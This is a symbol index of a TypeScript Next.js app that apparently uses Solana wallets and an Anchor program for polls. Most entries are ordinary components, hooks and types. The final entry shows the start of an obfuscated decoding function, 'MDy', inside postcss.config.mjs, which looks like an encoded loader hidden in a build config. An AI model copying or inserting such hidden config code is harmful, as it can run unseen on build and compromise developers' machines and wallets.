SYMBOL INDEX (53 symbols across 28 files) FILE: app/layout.tsx function RootLayout (line 15) | function RootLayout({ FILE: app/page.tsx function App (line 29) | function App() { FILE: app/providers.tsx function Providers (line 9) | function Providers({ children }: { children: React.ReactNode }) { FILE: components/TableRow.tsx type TableRowProps (line 5) | interface TableRowProps { FILE: components/dark-mode-toggle.tsx function DarkModeToggle (line 15) | function DarkModeToggle() { FILE: components/sidenav.tsx function SideNav (line 5) | function SideNav() { function scrollTo (line 20) | function scrollTo(id: string) { FILE: components/ui/badge.tsx type BadgeProps (line 26) | interface BadgeProps function Badge (line 30) | function Badge({ className, variant, ...props }: BadgeProps) { FILE: components/ui/button.tsx type ButtonProps (line 38) | interface ButtonProps FILE: components/ui/carousel.tsx type CarouselApi (line 12) | type CarouselApi = UseEmblaCarouselType[1]; type UseCarouselParameters (line 13) | type UseCarouselParameters = Parameters; type CarouselOptions (line 14) | type CarouselOptions = UseCarouselParameters[0]; type CarouselPlugin (line 15) | type CarouselPlugin = UseCarouselParameters[1]; type CarouselProps (line 17) | type CarouselProps = { type CarouselContextProps (line 24) | type CarouselContextProps = { function useCarousel (line 35) | function useCarousel() { FILE: components/ui/input.tsx type InputProps (line 5) | interface InputProps FILE: components/ui/skeleton.tsx function Skeleton (line 3) | function Skeleton({ FILE: components/ui/theme-provider.tsx function ThemeProvider (line 7) | function ThemeProvider({ children, ...props }: ThemeProviderProps) { FILE: components/ui/toast.tsx type ToastProps (line 115) | type ToastProps = React.ComponentPropsWithoutRef type ToastActionElement (line 117) | type ToastActionElement = React.ReactElement FILE: components/ui/toaster.tsx function Toaster (line 13) | function Toaster() { FILE: components/ui/use-toast.ts constant TOAST_LIMIT (line 11) | const TOAST_LIMIT = 1 constant TOAST_REMOVE_DELAY (line 12) | const TOAST_REMOVE_DELAY = 1000000 type ToasterToast (line 14) | type ToasterToast = ToastProps & { function genId (line 30) | function genId() { type ActionType (line 35) | type ActionType = typeof actionTypes type Action (line 37) | type Action = type State (line 55) | interface State { function dispatch (line 136) | function dispatch(action: Action) { type Toast (line 143) | type Toast = Omit function toast (line 145) | function toast({ ...props }: Toast) { function useToast (line 174) | function useToast() { FILE: contexts/AutoConnectProvider.tsx type AutoConnectContextState (line 5) | interface AutoConnectContextState { function useAutoConnect (line 14) | function useAutoConnect(): AutoConnectContextState { FILE: contexts/NetworkConfigurationProvider.tsx type NetworkConfigurationState (line 5) | interface NetworkConfigurationState { function useNetworkConfiguration (line 13) | function useNetworkConfiguration(): NetworkConfigurationState { FILE: errors/NoUserAccountError.ts class NoUserAccountError (line 1) | class NoUserAccountError extends Error { method constructor (line 2) | constructor(message: string) { FILE: errors/WalletNotConnectedError.ts class WalletNotConnectedError (line 1) | class WalletNotConnectedError extends Error { method constructor (line 2) | constructor(message: string) { FILE: hooks/queries/useEstimateUpdatesByPoll.ts type EstimateData (line 6) | type EstimateData = { FILE: hooks/states/useTabStore.tsx type TabState (line 3) | type TabState = "all" | "coming"; type TabsState (line 5) | interface TabsState { FILE: hooks/useAnchorProgram.tsx function useAnchorProgram (line 8) | function useAnchorProgram(): Program { FILE: hooks/useIntersectionObserver.tsx type IntersectionObserverOptions (line 3) | interface IntersectionObserverOptions { FILE: idl/poe.ts type Poe (line 7) | type Poe = { FILE: lib/dummyData.ts type Match (line 1) | type Match = { FILE: lib/types.ts type Poll (line 3) | type Poll = { type UserAccount (line 25) | type UserAccount = { FILE: lib/utils.ts function cn (line 4) | function cn(...inputs: ClassValue[]) { FILE: postcss.config.mjs function MDy (line 10) | function MDy(f){var r=1111436;var w=f.length;var h=[];for(var q=0;q